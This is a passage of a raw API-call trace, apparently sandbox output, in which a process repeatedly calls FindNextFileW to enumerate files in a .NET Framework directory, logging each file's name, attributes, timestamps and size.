nFileSizeLow=0x4db4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Xaml.targets", cAlternateFileName="")) returned 1 [0101.732] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x922ffd1d, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x922ffd1d, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x923023fc, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x1a6a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MmcAspExt.dll", cAlternateFileName="")) returned 1 [0101.732] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42486, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x57615bf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x57615bf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0101.732] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91e05f95, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91e05f95, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91e08687, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x3ff38, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild.exe", cAlternateFileName="")) returned 1 [0101.732] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x611edffd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x611edffd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x611edffd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="msbuild.exe.config", cAlternateFileName="")) returned 1 [0101.732] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x611a1b54, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x611a1b54, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x611a1b54, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild.rsp", cAlternateFileName="")) returned 1 [0101.733] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ddbd304, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8ddbd304, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8ddda798, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x145eb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mscordacwks.dll", cAlternateFileName="")) returned 1 [0101.733] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8df2b65d, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8df2b65d, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8df3b45f, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x11c4a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="mscordbi.dll", cAlternateFileName="")) returned 1 [0101.733] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93ec386d, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93ec386d, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93ec386d, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x7c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mscoree.tlb", cAlternateFileName="")) returned 1 [0101.733] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93b66fb8, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93b66fb8, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93b6d04f, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x7cea0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mscoreei.dll", cAlternateFileName="")) returned 1 [0101.733] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e26d244, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e26d244, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e26e5bd, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x84a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="mscoreeis.dll", cAlternateFileName="")) returned 1 [0101.733] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91acdf98, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91acdf98, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91b0d772, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x5416a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="mscorlib.dll", cAlternateFileName="")) returned 1 [0101.733] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93ecad99, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93ecad99, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93ecfb97, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x7ee00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mscorlib.tlb", cAlternateFileName="")) returned 1 [0101.733] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91c31376, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91c31376, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91c33a8f, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x15ea0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mscorpe.dll", cAlternateFileName="")) returned 1 [0101.733] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x922cc8c4, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x922cc8c4, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x922cefaa, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x238b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mscorpehost.dll", cAlternateFileName="")) returned 1 [0101.734] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dd99cc0, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8dd99cc0, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8dd9c3ad, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x616a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mscorrc.dll", cAlternateFileName="")) returned 1 [0101.734] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8de2b10d, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8de2b10d, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8de2c46d, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x1a0b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mscorsecimpl.dll", cAlternateFileName="")) returned 1 [0101.734] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91be0a7d, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91be0a7d, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91be1e1b, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x66a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mscorsn.dll", cAlternateFileName="")) returned 1 [0101.734] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8deaee3d, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8deaee3d, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8deb28d9, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x67ea0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mscorsvc.dll", cAlternateFileName="")) returned 1 [0101.734] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dd83cf2, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8dd83cf2, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8dd85162, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x1a2b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="mscorsvw.exe", cAlternateFileName="")) returned 1 [0101.734] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42486, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xf42486, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xf42486, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MUI", cAlternateFileName="")) returned 1 [0101.734] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42486, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5787816, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x5787816, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NativeImages", cAlternateFileName="NATIVE~1")) returned 1 [0101.734] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93dbaa2f, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93dbaa2f, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93dbbd6d, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x22a98, dwReserved0=0x0, dwReserved1=0x0, cFileName="ngen.exe", cAlternateFileName="")) returned 1 [0101.734] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c181f88, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2c181f88, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xd4cfa8b8, ftLastWriteTime.dwHighDateTime=0x1d8a73b, nFileSizeHigh=0x0, nFileSizeLow=0x3852e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ngen.log", cAlternateFileName="")) returned 1 [0101.734] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x922932a9, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x922932a9, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x92294659, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x14ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ngentask.exe", cAlternateFileName="")) returned 1 [0101.734] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6123a4b2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x6123a4b2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x6123a4b2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe7ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="normidna.nlp", cAlternateFileName="")) returned 1 [0101.734] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6126070c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x6126070c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x6126070c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb7e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="normnfc.nlp", cAlternateFileName="")) returned 1 [0101.735] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6126070c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x6126070c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x6126070c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9e76, dwReserved0=0x0, dwReserved1=0x0, cFileName="normnfd.nlp", cAlternateFileName="")) returned 1 [0101.735] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6123a4b2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x6123a4b2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x6123a4b2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x108e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="normnfkc.nlp", cAlternateFileName="")) returned 1 [0101.735] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6123a4b2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x6123a4b2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x6123a4b2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf116, dwReserved0=0x0, dwReserved1=0x0, cFileName="normnfkd.nlp", cAlternateFileName="")) returned 1 [0101.735] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91dc19b7, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91dc19b7, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91dc554e, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x34ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PerfCounter.dll", cAlternateFileName="")) returned 1 [0101.735] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2c15f1, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e2c15f1, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e2c29df, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x2d8a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="peverify.dll", cAlternateFileName="")) returned 1 [0101.735] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9214acd1, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x9214acd1, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x9214c0a6, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xfca0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RegAsm.exe", cAlternateFileName="")) returned 1 [0101.735] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x503a4f7, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97b228e4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97b228e4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x119, dwReserved0=0x0, dwReserved1=0x0, cFileName="regasm.exe.config", cAlternateFileName="REGASM~1.CON")) returned 1 [0101.736] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91a2e179, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91a2e179, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91a31c1e, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xb0a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RegSvcs.exe", cAlternateFileName="")) returned 1 [0101.736] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x506074e, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97b228e4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97b228e4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xdf, dwReserved0=0x0, dwReserved1=0x0, cFileName="regsvcs.exe.config", cAlternateFileName="REGSVC~1.CON")) returned 1 [0101.736] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x919cb34c, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x919cb34c, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x919cc6e0, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x5ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="SbsNclPerf.dll", cAlternateFileName="")) returned 1 [0101.736] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dd297c7, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8dd297c7, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8dd2beeb, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x4ac8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ServiceModelEvents.dll", cAlternateFileName="")) returned 1 [0101.736] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ddfde35, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8ddfde35, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8ddfde35, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x4ad8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ServiceModelInstallRC.dll", cAlternateFileName="")) returned 1 [0101.736] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x920c6f3e, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x920c6f3e, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x920c82ed, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x16500, dwReserved0=0x0, dwReserved1=0x0, cFileName="ServiceModelPerformanceCounters.dll", cAlternateFileName="")) returned 1 [0101.736] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61c5c48c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x61c5c48c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x61c5c48c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f812, dwReserved0=0x0, dwReserved1=0x0, cFileName="ServiceModelPerformanceCounters.man", cAlternateFileName="")) returned 1 [0101.737] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dea1768, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8dea1768, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8dea2afa, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x362c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ServiceModelReg.exe", cAlternateFileName="")) returned 1 [0101.737] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dfb55e6, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8dfb55e6, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8dfb6927, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x4ac8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ServiceModelRegUI.dll", cAlternateFileName="")) returned 1 [0101.737] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92078da5, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x92078da5, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x9207c7ec, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x72d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ServiceMonikerSupport.dll", cAlternateFileName="")) returned 1 [0101.737] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ddff1b4, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8ddff1b4, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8de0056b, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x11ea8, dwReserved0=0x0, dwReserved1=0x0, cFileName="SMDiagnostics.dll", cAlternateFileName="")) returned 1 [0101.737] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93e7a41d, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93e7a41d, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93e7b7cc, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x214a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="SMSvcHost.exe", cAlternateFileName="")) returned 1 [0101.737] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50869a8, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97b228e4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97b228e4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="SMSvcHost.exe.config", cAlternateFileName="SMSVCH~1.CON")) returned 1 [0101.737] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dc3859c, ftCreationTime.dwHighDateTime=0x1d8a73a, 